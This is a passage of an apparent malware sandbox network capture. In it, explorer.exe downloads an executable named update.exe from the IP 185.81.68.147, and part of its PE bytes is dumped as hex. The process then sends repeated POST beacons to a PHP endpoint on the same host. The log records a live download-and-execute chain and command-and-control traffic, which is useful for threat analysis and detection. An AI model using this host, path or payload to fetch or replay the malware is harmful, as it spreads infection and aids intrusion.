                                                                                                                                                                                                                      Data Ascii: HHl$@Ld$PtI+E3IH\$XIH A_A^^LFHWH@SWH8znHHu$xyHWH_H8_[HnLd$`Ie)LHu(LGHRH6Ld$`H8_[H2L|$ H!)LH
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133750916 CET1236INData Raw: 2c 4c 8d 05 ee 9f 02 00 0f c8 89 44 24 2c ba 40 00 00 00 8b 44 24 30 0f c8 89 44 24 30 8b 44 24 34 0f c8 89 44 24 34 89 83 1c 10 00 00 e8 88 01 00 00 8b 44 24 28 45 33 c0 48 2b f0 48 8b cf 48 8d 46 58 48 89 83 00 10 00 00 8b 54 24 2c 48 03 d0 e8
                                                                                                                                                                                                                      Data Ascii: ,LD$,@D$0D$0D$4D$4D$(E3H+HHFXHT$,HhL$0&HHuHHeT$0LAHHsH}HJyD$0HHH*tHgHH;
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133863926 CET672INData Raw: 50 20 00 00 48 8b 8f 28 20 00 00 ba 72 01 00 00 41 b8 01 00 00 00 ff 15 1a 95 02 00 4c 8b 87 48 20 00 00 4d 85 c0 74 72 48 8b 4f 08 ba 30 00 00 00 41 b9 01 00 00 00 ff 15 f9 94 02 00 4c 8b 87 48 20 00 00 41 b9 01 00 00 00 48 8b 8f 30 20 00 00 ba
                                                                                                                                                                                                                      Data Ascii: P H( rALH MtrHO0ALH AH0 0LH AH8 0LH AH@ 0H0 LO(E3LO E3H8 jHOHT$`tDD$lHT$hfD+D$d
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133930922 CET1236INData Raw: d3 ff 15 57 92 02 00 0f b7 54 24 3c 66 2b 54 24 34 eb 05 ba 14 00 00 00 0f b7 8e 60 20 00 00 44 0f b7 8e 5e 20 00 00 66 3b d1 0f b7 c1 c7 44 24 28 01 00 00 00 66 0f 43 c2 89 4c 24 20 0f b7 96 58 20 00 00 48 8b 8e 28 20 00 00 44 8b c2 0f b7 d8 ff
                                                                                                                                                                                                                      Data Ascii: WT$<f+T$4` D^ f;D$(fCL$ X H( D7X D$(f\$ f^ f+f+H0 DDX AD$(ffDf+f+\ f+f+f+DH8 DDT$ Z
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133941889 CET1236INData Raw: 48 8d 94 24 30 04 00 00 ff 15 3c 8d 02 00 eb 12 4c 8d 05 8b 95 02 00 48 8d 54 24 30 ff 15 30 8d 02 00 48 8b 8c 24 30 0c 00 00 48 33 cc e8 c0 91 00 00 48 81 c4 48 0c 00 00 5f 5b c3 cc cc cc cc cc cc 4c 8b dc 49 89 4b 08 49 89 53 10 4d 89 43 18 4d
                                                                                                                                                                                                                      Data Ascii: H$0<LHT$00H$0H3HH_[LIKISMCMK SWHHH]H3H$0HI{FH|$(HT$0LHD$ AHHA0LHT$03H$0H3$HH_[HT$LD$LL$ SV
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133953094 CET1236INData Raw: 0f 84 5f 01 00 00 48 8b c8 48 89 6c 24 60 48 8b 05 e1 12 04 00 4c 8b cb 4c 8b c6 4c 89 74 24 20 49 8b d7 41 8b ee ff 15 e2 88 02 00 4c 8b f8 48 85 c0 0f 84 08 01 00 00 85 ff 75 18 48 8b c8 48 8b 05 c8 12 04 00 ff 15 c2 88 02 00 48 8b e8 e9 c7 00
                                                                                                                                                                                                                      Data Ascii: _HHl$`HLLLt$ IALHuHHHHHHHHIHHH}HH`HHHIIHHLHH)HHH$
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133964062 CET1236INData Raw: 00 00 e9 b5 fe ff ff 49 8b d6 48 8d 0d 41 8e 02 00 e8 b4 f5 ff ff 48 8b 05 ad 0d 04 00 ff 15 17 84 02 00 b8 ff ff ff ff e9 8f fe ff ff 48 8d 0d de 8d 02 00 e8 91 f5 ff ff b8 ff ff ff ff e9 79 fe ff ff 48 8d 0d 90 8d 02 00 e8 7b f5 ff ff b8 ff ff
                                                                                                                                                                                                                      Data Ascii: IHAHHyH{c@SH Hb*u8H00+u%HS'uH(uHH [6H [@SAV0H+HHH3H$0H$1E3HH$(1
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.254342079 CET1236INData Raw: e8 71 86 00 00 48 2b e0 48 8b 05 37 ab 03 00 48 33 c4 48 89 84 24 60 20 00 00 48 8b f9 b9 02 00 00 00 e8 df 11 01 00 48 8b c8 33 d2 e8 69 12 01 00 48 8d 4f 10 e8 ac fe ff ff 85 c0 79 0c 48 c7 c0 ff ff ff ff e9 d6 01 00 00 48 8d 4f 10 48 89 9c 24
                                                                                                                                                                                                                      Data Ascii: qH+H7H3H$` HH3iHOyHHOH$ H HHHLOLhH$ L$ L A ! II;{oukAHHK}uHC%H


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      5192.168.2.849713185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.614217043 CET235OUTGET /update.exe HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943092108 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:15:49 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      Last-Modified: Sun, 15 Dec 2024 06:09:39 GMT
                                                                                                                                                                                                                      ETag: "4ba00-62948e8bd5049"
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Content-Length: 309760
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 eb 5a 12 27 8a 34 41 27 8a 34 41 27 8a 34 41 2e f2 a7 41 24 8a 34 41 27 8a 35 41 2d 8a 34 41 48 fc 9f 41 2d 8a 34 41 48 fc ae 41 26 8a 34 41 48 fc a9 41 26 8a 34 41 52 69 63 68 27 8a 34 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 92 72 5e 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 34 00 00 00 00 00 00 18 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$cZ'4A'4A'4A.A$4A'5A-4AHA-4AHA&4AHA&4ARich'4APEdr^g":44@@pr((LPX.text8: `.rdata#P$>@@.data@.pdataLb@@.rsrc(f@@.x64PPj
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943159103 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 89 54
                                                                                                                                                                                                                      Data Ascii: T$HL$HHD$ HD$HD$=MZt3VHD$Hc@<HL$ HHH$HD$ H9$s3/D$(HL$ HH9$v3H$8PEt3H$HHL$H
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943274021 CET1236INData Raw: 38 48 8d 0d a0 49 00 00 ff 15 6a 3f 00 00 48 8d 15 83 49 00 00 48 8b c8 ff 15 52 3f 00 00 48 89 44 24 20 48 83 7c 24 20 00 74 0b 48 8b 4c 24 40 ff 54 24 20 eb 02 33 c0 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc 44 89 44 24 18 89 54 24 10 48
                                                                                                                                                                                                                      Data Ascii: 8HIj?HIHR?HD$ H|$ tHL$@T$ 3H8DD$T$HL$HD$3:&?H$H$uH$D$h|$huz$H$H$H$uIH$@=L
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943372011 CET224INData Raw: 00 00 48 8d 05 3b 45 00 00 48 89 05 14 6b 00 00 48 8d 05 65 45 00 00 48 89 05 ce 6a 00 00 48 8d 05 e7 45 00 00 48 89 05 b0 6a 00 00 48 8d 05 41 45 00 00 48 89 05 9a 6a 00 00 48 8d 05 6f 46 00 00 48 89 05 b4 6a 00 00 48 c7 44 24 28 00 00 00 00 48
                                                                                                                                                                                                                      Data Ascii: H;EHkHeEHjHEHjHAEHjHoFHjHD$(HdFHmFHjHjFHsFHjHpFHqFHjHjFHoFHjHhFHmFHjHjFHkF
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943403006 CET1236INData Raw: 00 e8 a2 fe ff ff 48 89 05 77 6a 00 00 48 8d 15 64 46 00 00 48 8d 0d 69 46 00 00 e8 88 fe ff ff 48 89 05 65 6a 00 00 48 8d 15 62 46 00 00 48 8d 0d 67 46 00 00 e8 6e fe ff ff 48 89 05 53 6a 00 00 48 8d 15 64 46 00 00 48 8d 0d 65 46 00 00 e8 54 fe
                                                                                                                                                                                                                      Data Ascii: HwjHdFHiFHejHbFHgFnHSjHdFHeFTHAjH^FHcF:H/jH\FHaF H5iH^FHoFHlHlFH}FHlHzFHFHlHFHFhH
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943458080 CET1236INData Raw: 8d 15 12 48 00 00 48 8d 0d 23 48 00 00 e8 c2 f9 ff ff 48 89 05 af 67 00 00 48 8d 15 20 48 00 00 48 8d 0d 31 48 00 00 e8 a8 f9 ff ff 48 89 05 9d 67 00 00 48 8d 15 2e 48 00 00 48 8d 0d 37 48 00 00 e8 8e f9 ff ff 48 89 05 43 67 00 00 48 8d 15 34 48
                                                                                                                                                                                                                      Data Ascii: HH#HHgH HH1HHgH.HH7HHCgH4HH=HtHqeH:HHKHZHgHHHHYH@HgHVHHgH&HfHdHHuHHfHrHH{HHeHxHH
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943492889 CET1236INData Raw: fc f4 ff ff 48 89 05 49 61 00 00 48 8d 15 d2 49 00 00 48 8d 0d e3 49 00 00 e8 e2 f4 ff ff 48 89 05 f7 61 00 00 48 8d 15 e0 49 00 00 48 8d 0d e9 49 00 00 e8 c8 f4 ff ff 48 89 05 e5 61 00 00 48 8d 15 e6 49 00 00 48 8d 0d ef 49 00 00 e8 ae f4 ff ff
                                                                                                                                                                                                                      Data Ascii: HIaHIHIHaHIHIHaHIHIHaHIHIHaHIHJzHaHJHJ`HaHJHJHScHJH%JHAcH"JH+JHa
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943594933 CET1236INData Raw: 00 b0 01 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 57 48 81 ec a0 0a 00 00 c7 84 24 80 00 00 00 00 00 00 00 48 8d 84 24 88 00 00 00 48 8b f8 33 c0 b9 60 00 00 00 f3 aa 48 c7 84 24 20 01 00 00 00 00 00 00 48 8d 84
                                                                                                                                                                                                                      Data Ascii: H(L$WH$H$H3`H$ H$(H33f$@AH$@3\$X$Xu3f$@H$BH3$$$$t$t*$t>ZE3
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943655014 CET1236INData Raw: 48 63 40 3c 48 8b 4c 24 60 48 03 c8 48 8b c1 48 63 8c 24 50 0a 00 00 48 6b c9 28 48 8d 84 08 08 01 00 00 48 89 84 24 08 01 00 00 48 8b 84 24 08 01 00 00 8b 40 10 48 8b 8c 24 08 01 00 00 8b 49 14 48 8b 54 24 60 48 03 d1 48 8b ca 48 8b 94 24 08 01
                                                                                                                                                                                                                      Data Ascii: Hc@<HL$`HHHc$PHk(HH$H$@H$IHT$`HHH$RH$`HHHD$ DLH$ XuA3HL$`KW/HD$XH$H@0H$H+HHD$XH$H$HH0$T$T
                                                                                                                                                                                                                      Dec 15, 2024 09:15:49.943690062 CET552INData Raw: 00 48 8b 4c 24 28 ff 15 8c 52 00 00 b8 01 00 00 00 eb 18 48 8b 4c 24 28 ff 15 c2 54 00 00 48 8b 4c 24 28 ff 15 6f 52 00 00 33 c0 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 38 4c 8b 44 24 40 33 d2 33 c9
                                                                                                                                                                                                                      Data Ascii: HL$(RHL$(THL$(oR3H8HL$H8LD$@33THD$ H|$ uHL$ pTHL$ RBPT=uHL$ FTHL$ QHL$ )THL$ Q3H8HL$HXH$@D$ H
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.063641071 CET1236INData Raw: 00 00 00 00 44 8b 0d 89 53 00 00 4c 8b 05 be 55 00 00 ba 02 00 00 00 48 8d 0d 92 53 00 00 e8 5d 13 00 00 e8 98 0a 00 00 48 8b 15 91 4f 00 00 48 c7 c1 01 00 00 80 e8 25 0b 00 00 48 8b 15 6e 4f 00 00 48 c7 c1 01 00 00 80 e8 12 0b 00 00 48 8d 0d db
                                                                                                                                                                                                                      Data Ascii: DSLUHS]HOH%HnOHH<H<H=H=H+=H7=HC=HO=Hc=HRHh=#P3H8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      6192.168.2.849715185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.166878939 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.287192106 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.789330959 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:15:51 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      7192.168.2.849717185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.026787043 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.146687984 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.635310888 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:15:54 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      8192.168.2.849718185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.918987036 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:15:56.038889885 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.545193911 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:15:56 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      9192.168.2.849719185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.770332098 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.890275955 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.386028051 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:15:58 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      10192.168.2.849720185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.613914013 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.733813047 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.233606100 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:00 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      11192.168.2.849721185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.457843065 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.577836037 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:02.918786049 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:02 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      12192.168.2.849722185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:03.146258116 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:03.266019106 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:04.761301994 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:03 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      13192.168.2.849723185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:05.011244059 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:05.131362915 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.633924961 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:05 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      14192.168.2.849724185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.864800930 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.984734058 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.299624920 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:07 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      15192.168.2.849725185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.540802956 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.660609961 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.148746014 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:09 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      16192.168.2.849726185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.379833937 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
